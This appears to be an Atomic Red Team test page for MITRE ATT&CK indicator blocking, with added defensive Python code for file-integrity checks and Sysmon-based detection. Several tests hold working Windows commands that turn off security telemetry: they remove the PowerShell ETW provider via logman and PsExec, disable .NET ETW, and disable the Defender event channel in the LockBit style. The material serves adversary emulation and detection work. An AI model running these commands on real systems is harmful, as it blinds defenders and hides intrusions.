An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW) (Citation: Microsoft About Event Tracing 2018), by tampering with the settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry, and are also reachable through administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). For example, adversaries may modify the `File` value in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security` to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately. (Citation: disable_win_evt_logging)

ETW interruption can be achieved in multiple ways, most directly by defining conditions with the [PowerShell](https://attack.mitre.org/techniques/T1059/001) `Set-EtwTraceProvider` cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block the traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to the specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities and facilitate follow-on behaviors. (Citation: LemonDuck)
- Atomic Test #1 - Auditing Configuration Changes on Linux Host
- Atomic Test #2 - Auditing Configuration Changes on FreeBSD Host
- Atomic Test #3 - Logging Configuration Changes on Linux Host
- Atomic Test #4 - Logging Configuration Changes on FreeBSD Host
- Atomic Test #5 - Disable Powershell ETW Provider - Windows
- Atomic Test #6 - Disable .NET Event Tracing for Windows Via Registry (cmd)
- Atomic Test #7 - Disable .NET Event Tracing for Windows Via Registry (powershell)
- Atomic Test #8 - LockBit Black - Disable the ETW Provider of Windows Defender -cmd
- Atomic Test #9 - LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
Atomic Test #1 - Auditing Configuration Changes on Linux Host

Emulates modification of auditd configuration files.

Supported Platforms: Linux

auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf |
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf |
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf |

Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

```bash
# Append a marker comment as the last line of each audit-related config file.
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
```

Cleanup Commands:

```bash
# Remove the last line (the marker) from each file touched above.
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
```
Atomic Test #2 - Auditing Configuration Changes on FreeBSD Host

Emulates modification of auditd configuration files.

Supported Platforms: Linux

auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event |

Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
```

Cleanup Commands:

```sh
# BSD sed needs an explicit (empty) backup suffix after -i.
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
```
Atomic Test #3 - Logging Configuration Changes on Linux Host

Emulates modification of syslog configuration.

Supported Platforms: Linux

auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf |
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf |
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf |

Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

```bash
# Append a marker comment to whichever syslog implementations are present.
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```

Cleanup Commands:

```bash
# Remove the last line (the marker) from each file touched above.
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
Atomic Test #4 - Logging Configuration Changes on FreeBSD Host

Emulates modification of syslog configuration.

Supported Platforms: Linux

auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf |

Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
```

Cleanup Commands:

```sh
# BSD sed needs an explicit (empty) backup suffix after -i.
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
```
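All four Linux/FreeBSD tests above change a logging or audit configuration file by appending a line, which is exactly the kind of change a file-integrity baseline catches. The following is an added example, not part of the Atomic Red Team tests: it hashes a watched list of configuration files (the default file names used by the tests above, a constructed list to be adjusted per host), stores the baseline, and reports files that were modified, deleted or created. `run_demo()` replays Test #1's append in a scratch directory rather than under `/etc`.

```python
"""Baseline-and-compare integrity check for logging/audit configuration
files (added example; WATCHED_FILES is a constructed default list)."""
import hashlib
import os
import tempfile

# Config files the tests above append to; adjust for the host being monitored.
WATCHED_FILES = [
    "/etc/audisp/audispd.conf",
    "/etc/audit/auditd.conf",
    "/etc/libaudit.conf",
    "/etc/syslog.conf",
    "/etc/rsyslog.conf",
    "/etc/syslog-ng/syslog-ng.conf",
]


def hash_file(path):
    """SHA-256 of the file's bytes, or None when the file does not exist."""
    try:
        with open(path, "rb") as fh:
            return hashlib.sha256(fh.read()).hexdigest()
    except FileNotFoundError:
        return None


def take_baseline(paths):
    """Record the current hash (or absence) of every watched file."""
    return {p: hash_file(p) for p in paths}


def compare_to_baseline(baseline, paths=None):
    """Return (path, status) for each file whose state differs from baseline."""
    changes = []
    for p in (paths or baseline):
        before, now = baseline.get(p), hash_file(p)
        if before == now:
            continue
        if before is None:
            status = "created"
        elif now is None:
            status = "deleted"
        else:
            status = "modified"
        changes.append((p, status))
    return changes


def run_demo():
    """Simulate Test #1's change in a temporary tree instead of /etc."""
    with tempfile.TemporaryDirectory() as root:
        paths = [os.path.join(root, os.path.relpath(p, "/")) for p in WATCHED_FILES]
        # Pretend only the three audit files exist on this host (constructed).
        for p in paths[:3]:
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "w") as fh:
                fh.write("# constructed config\n")
        base = take_baseline(paths)
        # Same action as the test: append a marker line to the audisp config.
        with open(paths[0], "a") as fh:
            fh.write("#art_test_1562_006_1\n")
        # An attacker might also simply remove a config; cover that case too.
        os.remove(paths[2])
        return [(os.path.relpath(p, root), s) for p, s in compare_to_baseline(base)]


if __name__ == "__main__":
    for path, status in run_demo():
        print(f"[!] {status}: {path}")
```

In production the baseline dictionary would be written somewhere the local root user cannot silently rewrite (a remote store or a signed file), since the same privilege that edits `auditd.conf` can edit a local baseline.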
Atomic Test #5 - Disable Powershell ETW Provider - Windows

This test was created to disable the Microsoft PowerShell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.

Supported Platforms: Windows

auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe |
| session | The session to disable. | string | EventLog-Application |
| provider | The provider to disable. | string | Microsoft-Windows-Powershell |

Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
# Runs logman as SYSTEM via PsExec; the double-dash form --p removes the provider from the running trace session (-ets).
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
```

Cleanup Commands:

```powershell
# -p re-adds the provider to the session.
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
```

Dependencies: Run with `powershell`!

Check Prereq Commands:

```powershell
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
```
Atomic Test #6 - Disable .NET Event Tracing for Windows Via Registry (cmd)

Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry.

Supported Platforms: Windows

auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b

Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
```

Cleanup Commands:

```cmd
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
```
Atomic Test #7 - Disable .NET Event Tracing for Windows Via Registry (powershell)

Disables ETW for the .NET Framework using PowerShell to update the Windows registry.

Supported Platforms: Windows

auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758

Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
```

Cleanup Commands:

```powershell
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
```
Atomic Test #8 - LockBit Black - Disable the ETW Provider of Windows Defender -cmd

An adversary can disable the ETW Provider of Windows Defender, so that nothing is logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

Supported Platforms: Windows

auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41

Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```

Cleanup Commands:

```cmd
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```
Atomic Test #9 - LockBit Black - Disable the ETW Provider of Windows Defender -Powershell

An adversary can disable the ETW Provider of Windows Defender, so that nothing is logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

Supported Platforms: Windows

auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02

Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
```

Cleanup Commands:

```powershell
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```
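The technique description at the top of the page and the Windows tests above all come down to a handful of observable host events: a write to the `File` value under the Security event log service key, `ETWEnabled` set to 0 under `.NETFramework`, an event channel's `Enabled` value set to 0 under `WINEVT\Channels`, or `logman update trace ... --p` removing a provider from a session. The following is an added detection example, not Atomic Red Team or MITRE code: it runs those rules over constructed Sysmon-style events (field names follow Sysmon's RegistryEvent ID 13 and ProcessCreate ID 1; the sample events, image paths and label strings are assumptions).

```python
"""Flag registry writes and process launches matching the indicator-blocking
actions on this page (added example; events below are constructed)."""
import re

# Registry values named on this page. A wanted value of None means any write
# to that value is notable; 0 means only a write that disables it.
REGISTRY_RULES = [
    (re.compile(r"\\Services\\EventLog\\Security\\File$", re.I), None,
     "Security event log file path changed"),
    (re.compile(r"\\Microsoft\\\.NETFramework\\ETWEnabled$", re.I), 0,
     ".NET Framework ETW disabled"),
    (re.compile(r"\\WINEVT\\Channels\\[^\\]+\\Enabled$", re.I), 0,
     "Windows event channel disabled"),
]
# logman's double-dash option (--p) removes a provider from a trace session.
LOGMAN_REMOVE_PROVIDER = re.compile(
    r"\blogman(?:\.exe)?\b.*\bupdate\b.*\s--p\s", re.I)


def dword_value(details):
    """Parse the DWORD rendering Sysmon puts in Details, e.g. 'DWORD (0x00000000)'."""
    m = re.search(r"DWORD \(0x([0-9a-fA-F]+)\)", details)
    return int(m.group(1), 16) if m else None


def flag_sensor_tampering(events):
    """Return a (label, image, target) tuple for every event that matches a rule."""
    findings = []
    for ev in events:
        if ev["EventID"] == 13:
            for pattern, wanted, label in REGISTRY_RULES:
                if not pattern.search(ev["TargetObject"]):
                    continue
                if wanted is None or dword_value(ev["Details"]) == wanted:
                    findings.append((label, ev["Image"], ev["TargetObject"]))
        elif ev["EventID"] == 1 and LOGMAN_REMOVE_PROVIDER.search(ev["CommandLine"]):
            findings.append(("ETW provider removed from trace session via logman",
                             ev["Image"], ev["CommandLine"]))
    return findings


# Constructed sample telemetry: the first four mirror the page's tests and
# description, the last two are benign and must not fire.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\Software\Microsoft\.NETFramework\ETWEnabled",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels"
                     r"\Microsoft-Windows-Windows Defender/Operational\Enabled",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\EventLog\Security\File",
     "Details": r"C:\Users\Public\sec.evtx"},
    {"EventID": 1, "Image": r"C:\Windows\System32\logman.exe",
     "CommandLine": 'logman update trace "EventLog-Application" '
                    '--p "Microsoft-Windows-Powershell" -ets'},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels"
                     r"\Microsoft-Windows-Windows Defender/Operational\Enabled",
     "Details": "DWORD (0x00000001)"},   # channel re-enabled: benign
    {"EventID": 1, "Image": r"C:\Windows\System32\logman.exe",
     "CommandLine": "logman query -ets"},  # read-only logman use: benign
]


if __name__ == "__main__":
    for label, image, target in flag_sensor_tampering(SAMPLE_EVENTS):
        print(f"[!] {label}: {image} -> {target}")
```

Because the page notes that the `File` redirect takes effect without a reboot, the rule for it fires on any write rather than on a specific value; the `Enabled`/`ETWEnabled` rules key on the DWORD so that the tests' own cleanup commands (which restore the default) do not page anyone.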